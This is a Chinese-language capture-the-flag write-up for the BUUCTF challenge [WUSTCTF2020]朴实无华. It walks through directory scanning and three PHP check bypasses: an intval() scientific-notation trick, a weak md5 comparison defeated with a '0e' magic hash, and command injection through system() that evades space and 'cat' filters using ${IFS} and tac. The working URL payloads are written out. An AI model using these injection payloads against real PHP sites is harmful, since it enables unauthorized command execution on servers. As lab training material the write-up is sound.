buuctf-[WUSTCTF2020]朴实无华

打开环境就这么一句话

先打开index.php,但是没有什么

 

查看了下网络

看到gzip和php

我试了试www.zip

还有index.phps，也是一样的，都没找到文件

于是我想到用御剑扫，但是我好像线程太长了，一个没扫到，我就想到用dirsearch

扫到robots.txt了

访问

再访问，得到一个假的flag

想到用bp抓包了

Look_at_me: /fl4g.php 

访问一下，发现都是乱码

搜索了一下火狐浏览器页面乱码怎么办

参考如何修复火狐浏览器的乱码问题（最新版）_火狐浏览器乱码_小宇特详解的博客-CSDN博客

找到修复文字编码

修复后正常了，这题怎么这么繁杂

 

从level1开始研究

//level 1
if (isset($_GET['num'])){
    $num = $_GET['num'];
    if(intval($num) < 2020 && intval($num + 1) > 2021){
        echo "我不经意间看了看我的劳力士, 不是想看时间, 只是想不经意间, 让你知道我过得比你好.
";
    }else{
        die("金钱解决不了穷人的本质问题");
    }
}else{
    die("去非洲吧"); 

php真的忘得差不多了

先去搜了搜这个函数

这个函数可以通过科学计数法来绕过

1e10 会被识别为1但是

1e10+1后就会恢复原本 

所以传入

?num=1e10

绕过成功

 

再看level2

//level 2
if (isset($_GET['md5'])){
   $md5=$_GET['md5'];
   if ($md5==md5($md5))
       echo "想到这个CTFer拿到flag后, 感激涕零, 跑去东澜岸, 找一家餐厅, 把厨师轰出去, 自己炒两个拿手小菜, 倒一杯散装白酒, 致富有道, 别学小暴.
";
   else
       die("我赶紧喊来我的酒肉朋友, 他打了个电话, 把他一家安排到了非洲");
}else{
    die("去非洲吧");
} 

 ==是弱类型比较，上网搜了下

https://www.cnblogs.com/dre0m1/p/16062369.html

所以传入md5=0e215962017

成功绕过

再看level3

if (isset($_GET['get_flag'])){
    $get_flag = $_GET['get_flag'];
    if(!strstr($get_flag," ")){
        $get_flag = str_ireplace("cat", "wctf2020", $get_flag);
        echo "想到这里, 我充实而欣慰, 有钱人的快乐往往就是这么的朴实无华, 且枯燥.
";
        system($get_flag);
    }else{
        die("快到非洲了");
    }
}else{
    die("去非洲吧");
}
?>

先看看函数

过滤了空格和cat，这里用的${IFS}。

查看一下目录

?num=1e10&md5=0e215962017&get_flag=ls

然后cat用tac，做完感觉确实不难。

?num=1e10&md5=0e215962017&get_flag=tac${IFS}fllllllllllllllllllllllllllllllllllllllllaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaag